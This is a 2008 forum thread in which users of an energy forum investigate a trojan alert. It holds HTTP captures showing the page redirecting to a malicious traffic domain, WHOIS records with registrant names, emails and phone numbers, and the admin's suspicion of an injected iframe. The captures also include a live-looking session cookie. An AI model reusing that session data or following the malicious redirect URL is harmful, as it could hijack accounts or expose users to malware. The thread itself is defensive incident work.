Trojan Alert

[starcruiser]

more info on this malware gang, these are Russian hackers.

http://ddanchev.blogspot.com/2007/11/new-media-malware-gang.html

I was looking is this your domain or the hoster?

http://www.w3.org/1999/xhtml

[turbo]

it still connects to the site, but the alert is gone.

http://www.overunity.com/index.php

GET /index.php HTTP/1.1
Host: www.overunity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php?action=forum
Cookie: SMFCookie11=a%3A4%3A%7Bi%3A0%3Bs%3A4%3A%223834%22%3Bi%3A1%3Bs%3A40%3A%226ce775d84aada0cb081928ac878a4e2fbdb4104f%22%3Bi%3A2%3Bi%3A1374524675%3Bi%3A3%3Bi%3A0%3B%7D; __utma=140742380.1068190726.1198593065.1198932286.1198956070.6; __utmz=140742380.1194179925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=94f7b935b23a9dfc8e1b044760bbd93c
If-Modified-Since: Fri, 11 Jan 2008 18:52:03 GMT

HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Fri, 11 Jan 2008 18:52:26 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4081
Keep-Alive: timeout=10
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
----------------------------------------------------------
h ttp://orentraff.cn/tdsslam/index.php?out=1193100109

GET /tdsslam/index.php?out=1193100109 HTTP/1.1
Host: orentraff.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php

HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
----------------------------------------------------------

[turbo]

the 88.255.94.14 adress is not the orentraff.cn adress this is  203.117.111.102
so the first adress redirected to the second adress.
the first seems to be a turkish company and the second australian.

-----------------------------------------

Domain Name: orentraff.cn ->> 203.117.111.102
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar:
Name Server:ns1.all-traff.com
Name Server:ns2.all-traff.com
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14



OrgName:    Asia Pacific Network Information Centre
OrgID:      APNIC
Address:    PO Box 2131
City:       Milton
StateProv:  QLD
PostalCode: 4064
Country:    AU

ReferralServer: whois://whois.apnic.net

NetRange:   202.0.0.0 - 203.255.255.255
CIDR:       202.0.0.0/7
NetName:    APNIC-CIDR-BLK
NetHandle:  NET-202-0-0-0-1
Parent:
NetType:    Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment:    This IP address range is not registered in the ARIN database.
Comment:    For details, refer to the APNIC Whois Database via
Comment:    WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment:    ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:    for the Asia Pacific region. APNIC does not operate networks
Comment:    using this IP address range and is not able to investigate
Comment:    spam or abuse reports relating to these addresses. For more
Comment:    help, refer to http://www.apnic.net/info/faq/abuse
Comment:
RegDate:    1994-04-05
Updated:    2005-05-20

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      203.117.0.0 - 203.117.255.255
netname:      STARHUBINTERNET-SG
descr:        root
country:      SG
admin-c:      NS110-AP
tech-c:       NS110-AP
mnt-by:       MAINT-AS4657-AP
status:       ALLOCATED NON-PORTABLE
changed:      admin_ipdb@starhub.com 20070605
source:       APNIC

person:       NOC SHI
nic-hdl:      NS110-AP
e-mail:       noc@starhub.com
address:      19 TaiSeng Drive
address:      Singapore 535222
phone:        +65 6825 7878
fax-no:       +65 6821 6012
country:      SG
changed:      ipadmin@starhub.com 20060607
mnt-by:       MAINT-AS4657-AP
source:       APNIC

--------------------------------------------------------------

88.255.94.14

OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv:
PostalCode: 1001EB
Country:    NL

ReferralServer: whois://whois.ripe.net:43

NetRange:   88.0.0.0 - 88.255.255.255
CIDR:       88.0.0.0/8
NetName:    88-RIPE
NetHandle:  NET-88-0-0-0-1
Parent:
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2004-04-01
Updated:    2004-04-06

# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '88.255.94.0 - 88.255.94.255'

inetnum:        88.255.94.0 - 88.255.94.255
netname:        AbdAllah_Internet
descr:          AbdAllah Internet Hizmetleri
descr:          Etnografya Muze mevkii Kirazlik Mh. No:32 Rize
country:        tr
admin-c:        MAG87-RIPE
tech-c:         MAG87-RIPE
status:         assigned pa
mnt-by:         as9121-mnt
source:         RIPE # Filtered

person:         Mahmod AbdAllah el Gashmi
address:        AbdAllah Internet Hizmetleri
e-mail:         ipadmin@ahlen.biz
phone:          +90 543 3767728
remarks:        ------------------------------------------------------
remarks:        Routing and peering issues: ipadmin@ahlen.biz
remarks:        SPAM and Network security issues: abuse@ahlen.biz
remarks:        Customer support: ipadmin@ahlen.biz
remarks:        General information: ipadmin@ahlen.biz
remarks:        ------------------------------------------------------
nic-hdl:        MAG87-RIPE
mnt-by:         sistem-net-mnt
source:         RIPE # Filtered

% Information related to '88.255.0.0/16AS9121'

route:          88.255.0.0/16
descr:          TurkTelekom
origin:         AS9121
mnt-by:         AS9121-MNT
source:         RIPE # Filtered

[turbo]

i am using mozilla on my own computer and it works fine.
but i just tried to load the forum page in IE6 and it gave another trojan alert.
so IE6 users be ware..

if you look into your msconfig you can switch it off if you are infected.

[hartiberlin]

Somehow somebody must have inserted an iframe into one file of my forum,
but I have not yet found the file,
where it is inserted.
If somebody familar with the SMF software can help ?
the index.php file calls many other PHP files
and I really must find this now..